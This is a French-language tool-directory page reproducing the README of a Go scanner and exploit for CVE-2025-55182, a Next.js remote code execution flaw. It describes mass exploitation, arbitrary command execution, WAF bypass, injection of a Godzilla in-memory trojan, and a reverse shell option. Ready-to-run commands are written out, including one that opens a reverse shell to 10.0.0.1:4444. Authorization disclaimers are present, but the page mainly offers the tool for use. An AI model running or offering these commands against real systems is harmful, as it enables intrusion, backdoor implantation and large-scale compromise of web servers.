Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-POC | Kitploit
Outils/GitHubGitHub/luoqichen/cve-2025-55182-poc
Scanners de VulnérabilitésExploitationShellcodeExploitation d'Applications WebContournement de WAFTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubluoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 Next.js RCE Scanner

License

Outil de scan et d'exploitation de la CVE-2025-55182, ciblant la vulnérabilité d'exécution de code à distance dans les applications Next.js. Prend en charge la détection en masse, l'exécution de commandes, l'injection de cheval de Troie mémoire Godzilla ainsi que la fonction de reverse shell.

⚠️ Cet outil est exclusivement destiné à la recherche en sécurité et aux tests autorisés. Ne l'utilisez pas à des fins illégales.

Fonctionnalités

  • Scan multi-cibles : prend en charge une URL unique, un fichier de liste (une URL par ligne) ainsi qu'un dossier contenant plusieurs fichiers .txt.
  • Multithreading concurrent : nombre de threads personnalisable pour améliorer l'efficacité du scan.
  • Validation de la vulnérabilité : vérifie la présence de la vulnérabilité en calculant le produit de nombres aléatoires.
  • Exécution de commandes : exécute des commandes système arbitraires sur la cible vulnérable (prend en charge Linux et Windows).
  • Injection de cheval de Troie mémoire Godzilla : génère en une commande les informations de connexion du cheval de Troie mémoire Godzilla.
  • Reverse shell : prend en charge la fonctionnalité de reverse shell.
  • Enregistrement des résultats : enregistre automatiquement les URLs exploitées avec succès et les détails associés dans success.json, avec possibilité d'exporter les URLs vulnérables vers un fichier spécifié.
  • Prise en charge du proxy : proxy HTTP configurable, facilitant l'intégration avec des outils tels que Burp Suite.
  • Affichage de la progression : affiche en temps réel la progression du scan, le temps écoulé, le temps restant estimé, etc.

[]

Installation

Prérequis

  • Go 1.16 ou version ultérieure
  • Git

Cloner le dépôt

root@kitploit:~
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC

Compilation

root@kitploit:~
go build -o cve-2025-55182 main.go

Exécution

root@kitploit:~
./cve-2025-55182 -h

Utilisation

Description des paramètres

Exemples

Scanner une cible unique

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000

Scanner en masse les cibles d'un fichier

root@kitploit:~
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt

Exécuter une commande

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -c "whoami"

Utiliser le cheval de Troie mémoire Godzilla

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -g

Après une injection réussie, l'outil affiche l'adresse de connexion, le mot de passe, la clé et les informations d'en-tête de requête Godzilla.

Reverse shell

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444

Activer le proxy

root@kitploit:~
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10

Explication des sorties

  • success.json : enregistre automatiquement les détails complets de toutes les cibles exploitées avec succès (y compris la sortie des commandes, la configuration Godzilla, etc.).
  • Fichier spécifié par -o : enregistre la liste des URLs vulnérables (une par ligne).

Pendant le scan, une barre de progression et les vulnérabilités découvertes sont affichées en temps réel, avec un récapitulatif statistique final.

Notes importantes

  1. Assurez-vous d'avoir obtenu une autorisation : scanner ou attaquer les systèmes d'autrui sans autorisation est illégal.
  2. Utilisation du proxy : si vous devez inspecter le trafic avec Burp Suite, utilisez le paramètre -p pour définir le proxy.
  3. Connexion Godzilla : après une injection réussie de Godzilla, connectez-vous à l'aide du client Godzilla ; notez que le mot de passe et la clé sont générés aléatoirement.
  4. Délai d'expiration : pour les cibles disposant d'un mauvais réseau, vous pouvez augmenter la valeur du paramètre -to en conséquence.

Avertissement

Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés. L'utilisateur assume seul l'entière responsabilité légale. Le développeur décline toute responsabilité en cas d'utilisation abusive.

License

MIT

Télécharger l’outil
ParamètreTypeValeur par défautDescription
-ustringaucunURL cible unique (par exemple http://example.com:3000)
-fstringaucunFichier contenant la liste des URLs (une par ligne)
-dstringaucunDossier contenant plusieurs fichiers .txt
-ostringaucunFichier de sortie (enregistre les URLs vulnérables, une par ligne)
-tint10Nombre de threads concurrents
-toint10Délai d'expiration des requêtes (en secondes)
-cstringaucunCommande à exécuter (par exemple id)
-mstringaucunMode : waf (active le contournement WAF)
-pstringaucunProxy HTTP (par exemple http://127.0.0.1:8080)
-gboolfalseActive l'injection du cheval de Troie mémoire Godzilla
-rsstringaucunAdresse du reverse shell (format IP:PORT)
-dvboolfalseMode verbeux (affiche le processus de scan pour chaque URL)
-esboolfalseMode de scan des informations sensibles